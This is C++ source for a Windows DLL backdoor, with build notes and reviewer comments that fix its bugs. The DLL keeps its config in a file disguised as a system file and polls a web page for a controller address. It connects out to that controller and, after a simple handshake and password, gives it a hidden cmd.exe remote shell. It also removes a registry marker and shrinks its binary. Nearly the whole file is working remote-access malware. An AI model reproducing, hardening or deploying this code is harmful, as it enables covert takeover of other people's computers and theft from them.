// Dll.cpp : Defines the initialization routines for the DLL.
//
/*
Build notes -----
1. Build the Release configuration, not Debug.
   A Debug build carries a lot of extra information. Built with the default settings the
   output is a hefty 152 KB. To build Release: in "Build ---> Configurations" remove
   "Win32 Debug" and rebuild; the file shrinks to 24 KB, still far from the target.
2. Define your own entry-point function.
   The default C/C++ entry function is main() or WinMain(), but neither is the true entry
   point: the compiler generates the real one when it produces the exe. To supply your own,
   rename main/WinMain to some other name (e.g. MyFun), open "Project ---> Settings", pick the
   "Link" tab, choose "Output" in the "Category" list, and enter the new function name
   (MyFun) in "Entry-Point symbol"; change the source accordingly and rebuild. Now 16 KB :)
   Note (review): bypassing the default entry point also bypasses the CRT/MFC start-up code,
   so the new/fopen/printf/MFC calls made below rely on the host process having initialised
   the runtime already — treat that as an assumption to verify before reusing this trick.
3. Optimise for minimum size.
4. Output: change the entry point to MyDll -- any name will do.
5. Link: /align:40
Points of this program worth studying:
1---- obtains the controller's IP and port from a URL and connects to it.
*/
#include "stdafx.h"
#include <afxdllx.h>
#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif
// ----- code added by us begins here -----------------------------------------------------
#include <afxinet.h>
#include <winsock2.h>
#include "Tiny.h"
#pragma comment(lib,"ws2_32.lib")
// Name of the configuration file; ReadIniFile looks for it in the Windows system directory.
// The "SystemUp" name and ".top" extension are presumably chosen to blend in with system files.
#define INIFILE "SystemUp.top"
// Status-message callback type referenced by the Winlogon-style notification structure below.
typedef DWORD (*PFNMSGECALLBACK)(BOOL bVerbose, LPWSTR lpMessage);
// Local copy of a Winlogon notification-package structure; the field list appears to mirror
// the WLX_NOTIFICATION_INFO from winwlx.h, presumably declared here to avoid that header.
// Only StartProcessAtStartup takes a pointer to it, and that function never reads it.
typedef struct _WLX_NOTIFICATION_INFO
{
ULONG Size;                        // size of this structure, in bytes
ULONG Flags;
PWSTR UserName;                    // user the notification concerns (not used in this file)
PWSTR Domain;
PWSTR WindowStation;
HANDLE hToken;                     // not used in this file
HDESK hDesktop;
PFNMSGECALLBACK pStatusCallback;   // status-message callback (typedef above)
} WLX_NOTIFICATION_INFO, *PWLX_NOTIFICATION_INFO;
// Configuration record read verbatim (raw struct image) from INIFILE by ReadIniFile.
// Nothing in ReadIniFile guarantees either array is NUL-terminated: pawssword is passed to
// strlen/strnicmp in CreateCMD, so a 16-byte password runs past the field.
// (The misspelling "pawssword" is part of the identifier and is used throughout the file.)
typedef struct IniInfor
{
char httpsrc[64];      // URL polled by StartMyService to learn the controller's address
char pawssword[16];    // shared secret checked by CreateCMD; an empty string disables the check
}IniInfor;
// Address of the remote controller ("master") most recently decoded from the polled URL.
// dwIP comes from inet_addr() and uPort from htons(), so both are already in network byte
// order and are copied straight into a SOCKADDR_IN by StartNewConnet.
typedef struct MasterInfor
{
DWORD dwIP;     // IPv4 address, network byte order
USHORT uPort;   // TCP port, network byte order
}MasterInfor;
// Arguments for SendThread: the read end of cmd.exe's stdout/stderr pipe and the socket to
// relay it to. bExit is set by CreateCMD to ask the thread to stop; it is a plain BOOL
// polled from another thread with no synchronisation.
typedef struct SendThreadInfor
{
HANDLE hSRead;   // read end of the child's stdout pipe (created in CreateCMD)
SOCKET sock;     // connection to the controller
BOOL bExit;      // stop request: written by CreateCMD, polled by SendThread
}SendThreadInfor;
// Forward declarations of the routines defined below.
VOID APIENTRY StartProcessAtStartup (PWLX_NOTIFICATION_INFO);   // Winlogon-style entry; starts the poller
DWORD WINAPI del(LPVOID lpParam);                                // deletes the Active Setup registry key
DWORD WINAPI StartMyService(LPVOID lpvoid);                      // polls the URL for the controller address
int GetHttpFile(LPCTSTR pszURL,LPCTSTR pszLocalFile,LPCTSTR dpStr);   // HTTP GET; extracts the "htt...end" fragment
BOOL ReadIniFile();                                              // loads Ini from INIFILE
BOOL DecodeMasterInfor(char* pStr , DWORD* pIp , USHORT* pPort); // parses "p://ip:port" into address/port
DWORD WINAPI CreateCMD(LPVOID lpvoid);                           // per-connection command loop; hosts cmd.exe
DWORD WINAPI StartNewConnet(LPVOID lpvoid);                      // connects out to the controller
DWORD WINAPI SendThread ( LPVOID lp );                           // pumps cmd.exe output to the socket
void DecodeCommand(char* pBuf , SOCKET sock , HANDLE hSWrite);   // forwards one command line to cmd.exe
// Process-wide state shared between the threads below without any locking.
MasterInfor msInfor = {0};   // current controller address; zeroed by CreateCMD when a connection drops
IniInfor Ini[2] = {0};       // Ini[0] is the live config; Ini[1] is filled by the same fread but never referenced
// ----- end of added code --------------------------------------------------------------------
static AFX_EXTENSION_MODULE DllDLL = { NULL, NULL };   // MFC extension-module state for this DLL
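// Custom DLL entry point (the build notes above set the linker's Entry-Point symbol to MyDll
// instead of the default DllMain). On process attach it initialises the MFC extension module,
// spawns a thread that deletes the Active Setup registry key (del), registers the
// CDynLinkLibrary and starts the controller-polling loop via StartProcessAtStartup; on detach
// it runs del again and tears the module down.
//
// hInstance  - module handle of this DLL
// dwReason   - DLL_PROCESS_ATTACH / DLL_PROCESS_DETACH (thread notifications are ignored)
// lpReserved - unused
// Returns 1 on success, 0 if AfxInitExtensionModule fails.
//
// NOTE(review): this runs under the loader lock, so threads created here cannot start until the
// entry point returns; the `del` thread started on DLL_PROCESS_DETACH may never run if the
// process is exiting. That design is left as-is; only the leaked thread handles are fixed.
extern "C" int APIENTRY
MyDll(HINSTANCE hInstance, DWORD dwReason, LPVOID lpReserved)
{
    UNREFERENCED_PARAMETER(lpReserved);
    if (dwReason == DLL_PROCESS_ATTACH)
    {
        TRACE0("DLL.DLL Initializing!\n");
        if (!AfxInitExtensionModule(DllDLL, hInstance))
            return 0;
        // Fix: the original never closed the thread handle; the thread is never joined.
        HANDLE hDel = CreateThread(NULL, 0, del, NULL, 0, NULL);   //ActiveX---
        if (hDel)
            CloseHandle(hDel);
        new CDynLinkLibrary(DllDLL);   // owned and freed by MFC
        StartProcessAtStartup(NULL);   // start the polling loop
    }
    else if (dwReason == DLL_PROCESS_DETACH)
    {
        TRACE0("DLL.DLL Terminating!\n");
        HANDLE hDel = CreateThread(NULL, 0, del, NULL, 0, NULL);   //ActiveX---
        if (hDel)
            CloseHandle(hDel);
        AfxTermExtensionModule(DllDLL);
    }
    return 1;
}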
//----------------------------------------------------------
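// Called from MyDll (with NULL) once the DLL is attached. The signature matches a Winlogon
// notification-package callback, which suggests the DLL was also meant to be registered as
// one; pInfo is never read, so that remains an assumption to confirm. Initialises Winsock
// and starts the StartMyService polling thread.
//
// pInfo - unused
//
// Fixes relative to the original: the CreateThread handle was leaked (the thread is never
// joined, so it is closed at once), and the unnamed mutex that was created, acquired and
// released inside this same function has been dropped — an unnamed local mutex cannot be
// contended by anyone else, so it serialised nothing. WSACleanup is still never called, as in
// the original: the poll loop runs for the life of the process.
VOID APIENTRY StartProcessAtStartup (PWLX_NOTIFICATION_INFO pInfo)
{
    UNREFERENCED_PARAMETER(pInfo);
    WSADATA wsaData;
    if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0)
        return;   // no networking available: nothing to do
    HANDLE hService = CreateThread(NULL, 0, StartMyService, NULL, 0, NULL);
    if (hService)
        CloseHandle(hService);   // not joined; release the handle
}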
// Thread routine: removes this component's HKCU "Active Setup\Installed Components" entry.
// NOTE(review): the {...} value is not a well-formed GUID (it contains non-hex characters such
// as H, R, O, S, J and K), so it is either a deliberately bogus marker or a transcription error
// in this listing. The result of RegDeleteKey is ignored and the thread always returns TRUE.
DWORD WINAPI del(LPVOID lpParam)
{
    UNREFERENCED_PARAMETER(lpParam);
    static const char kActiveSetupKey[] =
        "Software\\Microsoft\\Active Setup\\Installed Components\\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}";
    (void)RegDeleteKey(HKEY_CURRENT_USER, kActiveSetupKey);
    return TRUE;
}
// Thread routine started by StartProcessAtStartup. Loads the configuration, then loops forever:
// every 10 s it fetches Ini[0].httpsrc, extracts the "htt...end" fragment, decodes it into an
// IP/port pair and, whenever that pair differs from msInfor, records it and starts a
// StartNewConnet thread that calls back to the controller.
//
// lpvoid - unused
// Returns -1 (as a DWORD) if the config file cannot be read; otherwise never returns.
//
// NOTE(review): msInfor is written here and zeroed by CreateCMD (on disconnect) from another
// thread with no synchronisation. The CreateThread handle is never closed, and &msInfor is
// passed to the new thread although StartNewConnet reads the global directly.
DWORD WINAPI StartMyService(LPVOID lpvoid)
{
if ( !ReadIniFile() )
{
// alternatively: return FALSE;
return -1;
}
while ( TRUE )
{
char buf[1024] = {0};   // receives the decoded "p://ip:port" text from GetHttpFile
if ( !GetHttpFile(Ini[0].httpsrc,NULL,buf) )
{
Sleep(1000*10);   // fetch failed: retry in 10 s
TRACE("FALSE!");
continue;
}
DWORD IP=0;
USHORT Port = 0;
if ( !DecodeMasterInfor(buf,&IP,&Port) )
continue;   // unparseable payload: retries immediately (this path skips the Sleep below)
if ( msInfor.dwIP != IP || Port != msInfor.uPort )
{
printf("New THREAD!");   // stdout of a DLL; the host process may have no console
msInfor.dwIP = IP;
msInfor.uPort = Port;
CreateThread(NULL,NULL,StartNewConnet,(LPVOID)&msInfor,0,0);
}
Sleep(10000);
}
return 1;
}
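// Loads the configuration from INIFILE ("SystemUp.top") in the Windows system directory
// straight into the Ini array (raw struct image, no parsing).
//
// Returns TRUE if the file was opened and at least one byte was read, FALSE otherwise.
//
// Fixes relative to the original: GetSystemDirectory's result is checked (the old code indexed
// SystemPath[strlen()-1] even for an empty string and strcat'ed without a length check); the
// fread result is checked instead of ignored; and both strings in Ini[0] are forced
// NUL-terminated, because CreateCMD runs strlen/strnicmp on pawssword and GetHttpFile hands
// httpsrc to AfxParseURL. The last byte of each field is therefore reserved as the terminator
// (so the password is at most 15 characters).
BOOL ReadIniFile()
{
    char systemPath[MAX_PATH] = {0};
    UINT dirLen = GetSystemDirectory(systemPath, MAX_PATH);
    if (dirLen == 0 || dirLen >= MAX_PATH)
        return FALSE;   // Fix: the original indexed systemPath[-1] on an empty result
    // Append a separator only if the directory does not already end with one.
    const char *sep = (systemPath[dirLen - 1] == '\\') ? "" : "\\";
    if (dirLen + strlen(sep) + strlen(INIFILE) >= MAX_PATH)
        return FALSE;   // Fix: the original strcat could overrun MAX_PATH
    strcat(systemPath, sep);
    strcat(systemPath, INIFILE);

    FILE *fp = fopen(systemPath, "r");   // text mode kept as in the original; existing files may rely on it
    if (fp == NULL)
        return FALSE;
    // Both array slots are read, exactly as before; only the count is now checked.
    size_t got = fread(&Ini[0], 1, sizeof(Ini), fp);
    fclose(fp);
    if (got == 0)
        return FALSE;   // Fix: an empty or unreadable file used to be reported as success
    // Fix: guarantee termination for the string users in CreateCMD and GetHttpFile.
    Ini[0].httpsrc[sizeof(Ini[0].httpsrc) - 1] = '\0';
    Ini[0].pawssword[sizeof(Ini[0].pawssword) - 1] = '\0';
    return TRUE;
}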
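// Performs an HTTP GET of pszURL and scans the response line by line for the first line that
// contains "htt" followed later by "end"; the text between them (after the "htt") is copied
// into dpStr. A page containing "http://1.2.3.4:8080end" therefore yields "p://1.2.3.4:8080",
// which is the form DecodeMasterInfor expects.
//
// pszURL       - absolute http:// URL to fetch (other schemes are rejected by the service check)
// pszLocalFile - unused
// dpStr        - output buffer. It is declared LPCTSTR in the original prototype but written
//                through a cast; the caller must supply at least 1024 bytes (StartMyService
//                passes a zeroed char[1024]). The copy is bounded to 1023 bytes plus terminator.
// Returns TRUE if a fragment was found and copied, FALSE on any parse, connection or MFC error.
//
// Fixes relative to the original: the marker test read `pt1 && pt1` (pt2 was never checked, so
// a line with "htt" but no "end" dereferenced NULL); "end" is now required to follow "htt",
// otherwise pt2-pt1-3 went negative and memcpy ran with a huge length; the gotos no longer jump
// from outside the try block into it; and the caught CInternetException is released with
// Delete() as MFC requires. Cleanup now also runs when an exception was thrown.
int GetHttpFile(LPCTSTR pszURL,LPCTSTR pszLocalFile,LPCTSTR dpStr)
{
    UNREFERENCED_PARAMETER(pszLocalFile);
    const size_t kOutMax = 1023;   // matches the char[1024] the caller supplies
    CString strServerName;
    CString strObject;
    INTERNET_PORT nPort;
    DWORD dwServiceType = INTERNET_SERVICE_HTTP;
    if (!AfxParseURL(pszURL, dwServiceType, strServerName, strObject, nPort) ||
        dwServiceType != INTERNET_SERVICE_HTTP)
        return FALSE;

    int iResult = FALSE;
    CInternetSession session(_T(""));
    CHttpConnection* pServer = NULL;
    CHttpFile* pFile = NULL;
    try
    {
        pServer = session.GetHttpConnection(strServerName, nPort);
        if (pServer != NULL)
        {
            pFile = pServer->OpenRequest(CHttpConnection::HTTP_VERB_GET, strObject, NULL, 1, NULL, NULL, INTERNET_FLAG_RELOAD);
            if (pFile != NULL && pFile->SendRequest())
            {
                TCHAR sz[1024] = {0};
                while (!iResult && pFile->ReadString(sz, 1023))
                {
                    char* pt1 = strstr(sz, "htt");
                    // Fix: look for "end" only after the "htt" marker, and require both.
                    char* pt2 = pt1 ? strstr(pt1 + 3, "end") : NULL;
                    if (pt1 && pt2)
                    {
                        size_t n = (size_t)(pt2 - (pt1 + 3));
                        if (n > kOutMax)
                            n = kOutMax;
                        memcpy((char*)dpStr, pt1 + 3, n);
                        ((char*)dpStr)[n] = '\0';
                        iResult = TRUE;
                        TRACE("\n%s", dpStr);
                    }
                    memset(sz, 0, sizeof(sz));
                }
            }
        }
    }
    catch (CInternetException* pEx)
    {
        iResult = FALSE;
        pEx->Delete();   // MFC exception objects are heap-allocated and owned by the catcher
    }
    // Release in reverse order of acquisition, whether or not an exception fired.
    try
    {
        if (pFile)
        {
            pFile->Close();
            delete pFile;
        }
        delete pServer;   // delete NULL is a no-op
    }
    catch (CInternetException* pEx)
    {
        pEx->Delete();
    }
    return iResult;
}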
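// Parses the fragment produced by GetHttpFile, e.g. "p://1.2.3.4:8080" (the page text with the
// leading "htt" stripped), into a network-byte-order IPv4 address and TCP port.
//
// Layout expected: a leading 'p', a first ':', two characters that are skipped (the "//"),
// the dotted-quad address up to the next ':', then the decimal port to the end of the string.
//
// pStr  - NUL-terminated input; read only
// pIp   - receives inet_addr() of the address text
// pPort - receives htons() of the port
// Returns TRUE when both fields decoded to usable values, FALSE for anything else (on FALSE the
// outputs may have been written but callers ignore them, as before).
//
// Fixes relative to the original: the second strstr was evaluated as strstr(p1+1, ...) before
// p1 was checked for NULL; the address copy used p2-p1-3 unchecked, which is negative when the
// two colons are within three bytes of each other (memcpy with a huge size) and overran the
// 20-byte buffer for longer text; the port copy overran its 6-byte buffer for any port text
// longer than 5 characters. Over-long or malformed fields are now rejected rather than
// truncated, since truncation would silently connect to a different host or port; an address
// inet_addr() cannot parse (INADDR_NONE) and a port outside 1..65535 are rejected as well.
BOOL DecodeMasterInfor(char* pStr , DWORD* pIp , USHORT* pPort)
{
    if (pStr == NULL || pIp == NULL || pPort == NULL)
        return FALSE;
    if (strncmp(pStr, "p", 1) != 0)
        return FALSE;
    const char* p1 = strchr(pStr, ':');
    if (p1 == NULL)
        return FALSE;
    const char* p2 = strchr(p1 + 1, ':');
    if (p2 == NULL)
        return FALSE;

    // Address text lies between p1+3 and p2 and must fit "255.255.255.255".
    const char* ipStart = p1 + 3;
    if (p2 <= ipStart)
        return FALSE;   // Fix: the original passed a negative length to memcpy here
    size_t ipLen = (size_t)(p2 - ipStart);
    char Tip[20] = {0};
    if (ipLen >= sizeof(Tip))
        return FALSE;
    memcpy(Tip, ipStart, ipLen);

    // Port text is everything after p2: 1 to 5 decimal digits.
    const char* portStart = p2 + 1;
    size_t portLen = strlen(portStart);
    char Tport[6] = {0};
    if (portLen == 0 || portLen >= sizeof(Tport))
        return FALSE;
    memcpy(Tport, portStart, portLen);
    char* end = NULL;
    long port = strtol(Tport, &end, 10);
    if (end == Tport || *end != '\0' || port < 1 || port > 65535)
        return FALSE;   // Fix: atoi accepted trailing junk and out-of-range values

    *pIp = inet_addr(Tip);
    *pPort = htons((USHORT)port);
    if (*pIp == 0 || *pIp == INADDR_NONE || *pPort == 0)
        return FALSE;
    return TRUE;
}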
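// Thread routine: connects out to the controller recorded in msInfor and performs the
// "Who?" / "CKAdmin" handshake, retrying once a second until the peer answers correctly.
// On success the socket is handed to a CreateCMD thread and this thread ends.
//
// lpvoid - ignored (StartMyService passes &msInfor, but the global is read directly)
// Returns 1 after handing the socket over, 0 if the CreateCMD thread could not be created.
// Never returns while the controller is unreachable or answers something else.
//
// Fixes relative to the original: recv() could fill the whole 64-byte reply buffer, leaving no
// terminator for strcmp — one byte is now reserved; socket() failures are checked so an invalid
// descriptor is not connect()ed in a loop; a fresh socket is created for every attempt instead
// of re-using one whose connect already failed; the socket is closed when CreateThread fails;
// and the CreateCMD thread handle, previously leaked, is closed since it is never joined.
// The 3 s receive timeout is still applied only for the handshake and restored afterwards.
DWORD WINAPI StartNewConnet(LPVOID lpvoid)
{
    UNREFERENCED_PARAMETER(lpvoid);
    SOCKADDR_IN addr_in = {0};
    addr_in.sin_family = AF_INET;
    addr_in.sin_addr.S_un.S_addr = msInfor.dwIP;   // already network byte order
    addr_in.sin_port = msInfor.uPort;

    for (;;)
    {
        SOCKET sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        if (sock != INVALID_SOCKET &&
            connect(sock, (struct sockaddr*)&addr_in, sizeof(addr_in)) == 0)
        {
            send(sock, "Who?", 4, 0);
            // Bound the wait for the reply to 3 s, then put the previous timeout back.
            int oldopt = 0;
            int len = sizeof(int);
            getsockopt(sock, SOL_SOCKET, SO_RCVTIMEO, (char*)&oldopt, &len);
            int newopt = 3000;
            setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO, (char*)&newopt, len);
            char buf[64] = {0};
            recv(sock, buf, sizeof(buf) - 1, 0);   // Fix: keep one byte for the terminator
            setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO, (char*)&oldopt, len);
            if (strcmp(buf, "CKAdmin") == 0)
            {
                HANDLE hCmd = CreateThread(NULL, 0, CreateCMD, (LPVOID)sock, 0, 0);
                if (hCmd == NULL)
                {
                    closesocket(sock);   // nobody else owns it now
                    return 0;
                }
                CloseHandle(hCmd);   // CreateCMD owns the socket from here on
                return 1;
            }
        }
        if (sock != INVALID_SOCKET)
            closesocket(sock);   // wrong reply, timeout, or connect failure: start over
        Sleep(1000);
    }
}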
// Thread routine owning one controller connection (the socket passed as lpvoid). This is the
// remote-shell core of the DLL. Protocol as implemented below (every match is a case-insensitive
// prefix match via strnicmp):
//   1. "Start"      -> replies "Master" and a password prompt; if Ini[0].pawssword is empty the
//                      session is authenticated immediately.
//   2. <password>   -> compared against Ini[0].pawssword for strlen(pawssword) bytes only.
//   3. once authenticated, a hidden cmd.exe is started with stdin/stdout/stderr on anonymous
//      pipes; every later line goes to DecodeCommand, and SendThread relays the child's output
//      back over the socket.
//   4. "StopServer" -> terminates the shell and returns to step 1.
// A recv() error (-1) ends the thread: SendThread is joined, msInfor is zeroed so that
// StartMyService reconnects on its next poll, and the socket is closed.
//
// lpvoid - the connected SOCKET itself (cast, not a pointer)
// Returns 0 on disconnect; the trailing `return 1` is unreachable (the loop has no break).
//
// NOTE(review) — defects visible in this block, left unchanged here:
//  * recv() may fill all 1024 bytes of Buffer, leaving no terminator for the string functions,
//    and DecodeCommand appends "\r\n" to that same buffer.
//  * only ret == -1 is treated as disconnect; a graceful close (recv returns 0) keeps the loop
//    running with an empty buffer.
//  * the password check is a case-insensitive prefix match, so any line beginning with the
//    password passes; an empty password disables authentication altogether.
//  * send(sock, "请输入您的密码\r\n", 30, 0): the literal is 16 bytes in GBK (23 in UTF-8), so
//    30 bytes over-reads past it; when a password is configured the prompt is sent twice.
//  * GetExitCodeThread is called with a process handle; hProcess, ProInfor.hThread, hSRead,
//    hSWrite and ht are never closed, so each Start/StopServer cycle leaks handles.
//  * the mutex around CreateProcess is unnamed and local to this call, so it serialises nothing.
//  * msInfor and L.bExit are shared with other threads without synchronisation.
DWORD WINAPI CreateCMD(LPVOID lpvoid)
{
BOOL bActive = FALSE;       // "Start" received
BOOL bPass = FALSE;         // password accepted (or none configured)
SOCKET sock = (SOCKET)lpvoid;
HANDLE hStdOut = NULL, hSRead = NULL;      // child stdout/stderr pipe: write end (child), read end (us)
HANDLE hStdInput = NULL, hSWrite = NULL;   // child stdin pipe: read end (child), write end (us)
HANDLE hProcess = NULL;                    // cmd.exe process handle
BOOL IsStartCMD = FALSE;                   // cmd.exe currently running
HANDLE ht = NULL;                          // SendThread handle
SendThreadInfor L = {0};                   // shared with SendThread; lives on this stack frame
// receive commands
while ( TRUE )
{
char Buffer [ 1024 ] = {0};
int ret = -1;
TRACE("\n Buffer = %s \n" ,Buffer);        // traces the just-zeroed buffer, i.e. always empty
if ( bActive && bPass )
if ( !IsStartCMD )
{
// Authenticated and no shell yet: spawn cmd.exe with redirected standard handles.
IsStartCMD = TRUE;
SECURITY_ATTRIBUTES sa;
sa.bInheritHandle =TRUE;                   // both ends of both pipes become inheritable
sa.nLength = sizeof(sa);
sa.lpSecurityDescriptor = NULL;
CreatePipe ( &hSRead, &hStdOut, &sa, 0 );       // child writes hStdOut, we read hSRead
CreatePipe ( &hStdInput, &hSWrite, &sa, 0 );    // child reads hStdInput, we write hSWrite
STARTUPINFO StartInfor = {0};
PROCESS_INFORMATION ProInfor = {0};
StartInfor.cb = sizeof ( STARTUPINFO );
StartInfor.wShowWindow = SW_HIDE;               // no visible console window
StartInfor.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
StartInfor.hStdOutput = StartInfor.hStdError = hStdOut;
StartInfor.hStdInput = hStdInput;
TCHAR SysDir[MAX_PATH] = {0};
GetSystemDirectory(SysDir,MAX_PATH);
if ( SysDir[strlen(SysDir)-1] != '\\')
strcat(SysDir,"\\");
strcat(SysDir,"cmd.exe");                       // full path: no PATH lookup
HANDLE hmutex=CreateMutex(NULL,FALSE,NULL); // create mutex object (unnamed and local: no effect)
WaitForSingleObject(hmutex,INFINITE);
CreateProcess(NULL,SysDir,NULL,NULL,TRUE,NULL,NULL,NULL,&StartInfor,&ProInfor);   // result unchecked
hProcess = ProInfor.hProcess;
CloseHandle(hStdOut);                           // drop our copies of the child's pipe ends
CloseHandle(hStdInput);
ReleaseMutex(hmutex);
CloseHandle(hmutex);
L.hSRead = hSRead;
L.sock = sock;
L.bExit = FALSE;
ht = CreateThread(NULL,NULL,SendThread,(LPVOID)&L,0,0);   // output pump
}
ret = recv(sock,Buffer,1024,0);            // no byte reserved for a NUL terminator
if ( ret == -1 )
{
//sock disconnect
L.bExit = TRUE;
if ( ht )
WaitForSingleObject(ht,INFINITE);          // let SendThread notice bExit and exit
memset(&msInfor,0,sizeof(msInfor));        // forces StartMyService to reconnect on its next poll
closesocket(sock);
return 0;
}
// parse the command
if ( bActive && bPass )
{
if ( strnicmp("StopServer",Buffer,strlen("StopServer") ) )
{
// anything but "StopServer" is a shell command line
DecodeCommand(Buffer,sock, hSWrite);
continue;
}
else
{
// "StopServer": kill the shell and drop back to the unauthenticated state
bActive = FALSE;
bPass = FALSE;
IsStartCMD = FALSE;
DWORD A;
// GetExitCodeThread(ht,&A);
// TerminateThread(ht,A);
L.bExit = TRUE;
Sleep(500);                                // SendThread polls bExit every 100 ms
GetExitCodeThread(hProcess,&A);            // hProcess is a process handle, not a thread handle
TerminateProcess(hProcess,A);
continue;
}
}
if ( bActive == FALSE )
{
if ( !strnicmp( Buffer , "Start" , 5 ) )
{
bActive = TRUE;
Sleep(500);
int o = send(sock,"Master", 6, 0);         // handshake reply
//send(sock,"Master", 6, 0);
TRACE("\n######## %d #####", o);
send(sock,"请输入您的密码\r\n", 30 ,0 );   // "please enter your password"; 30 exceeds the literal's length
// send(sock,"######",6,0);
if ( Ini[0].pawssword[0] == 0 )
{
bPass=TRUE;                                // no password configured: authenticated at once
continue;
}
else
send(sock,"请输入您的密码\r\n", 30 ,0 );   // prompt sent a second time
continue;
}
}
if ( bPass == FALSE )
{
int l = strlen(Ini[0].pawssword);          // runs into Ini[1] if pawssword has no NUL
if ( !strnicmp( Buffer , Ini[0].pawssword , l ) )
{
char* p = "您输入的密码正确-欢迎您使用远程终端系统!\r\n";   // "password correct - welcome to the remote terminal system"
send ( sock , p , strlen(p),0 );
bPass = TRUE;
}
else
{
if ( strnicmp( Buffer , "StopServer", strlen("StopServer") ) )
{
char* p = "您输入的密码错误! 请重试\r\n";   // "wrong password, please retry"
send ( sock , p , strlen(p),0 );
}
else bActive = FALSE;                      // "StopServer" before auth just cancels "Start"
}
}
}
return 1;
}
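// Thread routine: relays cmd.exe's stdout/stderr (read end of the pipe in lp->hSRead) to the
// controller socket. Polls every 100 ms with PeekNamedPipe so the loop can also notice the
// bExit flag CreateCMD sets on "StopServer" or disconnect.
//
// lp - SendThreadInfor living on CreateCMD's stack frame; must outlive this thread
// Returns 1 when asked to stop, 0 if the pipe failed (cmd.exe exited or the handle is gone).
//
// Fixes relative to the original: the PeekNamedPipe and ReadFile results were ignored, so
// once the pipe broke (e.g. the operator typed "exit") the loop kept going with whatever the
// byte count happened to hold — spinning, or re-sending the last buffer. The thread now exits
// on pipe failure, and the count is reset before every peek. The commented-out "command done"
// marker in the original was dead code and is dropped.
DWORD WINAPI SendThread ( LPVOID lp )
{
    SendThreadInfor* info = (SendThreadInfor*)lp;
    HANDLE hSRead = info->hSRead;
    SOCKET sock = info->sock;
    TCHAR Buf[512] = {0};
    for (;;)
    {
        if (info->bExit == TRUE)
            return 1;   // stop requested by CreateCMD
        DWORD avail = 0;
        if (!PeekNamedPipe(hSRead, NULL, 0, NULL, &avail, NULL))
            return 0;   // pipe closed or invalid: nothing more will arrive
        if (avail == 0)
        {
            Sleep(100);
            continue;
        }
        DWORD readSize = 0;
        if (!ReadFile(hSRead, Buf, sizeof(Buf), &readSize, NULL))
            return 0;
        if (readSize > 0)
            send(sock, Buf, readSize, 0);
        memset(Buf, 0, sizeof(Buf));
    }
}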
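// Forwards one command line received from the controller to the hidden cmd.exe.
// A line starting with '-' is a "custom command": the original reserved this for built-in
// commands but never implemented any (it only computed a length and discarded it), so such
// lines are recognised and silently dropped, as before. Any other line is written to the
// child's stdin followed by "\r\n". The 500 ms delay before processing is kept as in the
// original.
//
// pBuf    - NUL-terminated command text. No longer modified: the original strcat'ed "\r\n"
//           onto the caller's buffer, overflowing it when CreateCMD's 1024-byte buffer was full.
// sock    - unused (kept for the callers)
// hSWrite - write end of cmd.exe's stdin pipe
//
// The line and its terminator are written as two WriteFile calls on the anonymous pipe;
// cmd.exe sees the same byte stream. WriteFile results are ignored, as before.
void DecodeCommand(char* pBuf , SOCKET sock , HANDLE hSWrite)
{
    UNREFERENCED_PARAMETER(sock);
    Sleep(500);
    if (*pBuf == '-')
        return;   // custom command: parsed but never acted upon in the original
    DWORD written = 0;
    DWORD len = (DWORD)strlen(pBuf);
    if (len > 0)
        WriteFile(hSWrite, pBuf, len, &written, NULL);
    WriteFile(hSWrite, "\r\n", 2, &written, NULL);   // cmd.exe executes on the line end
}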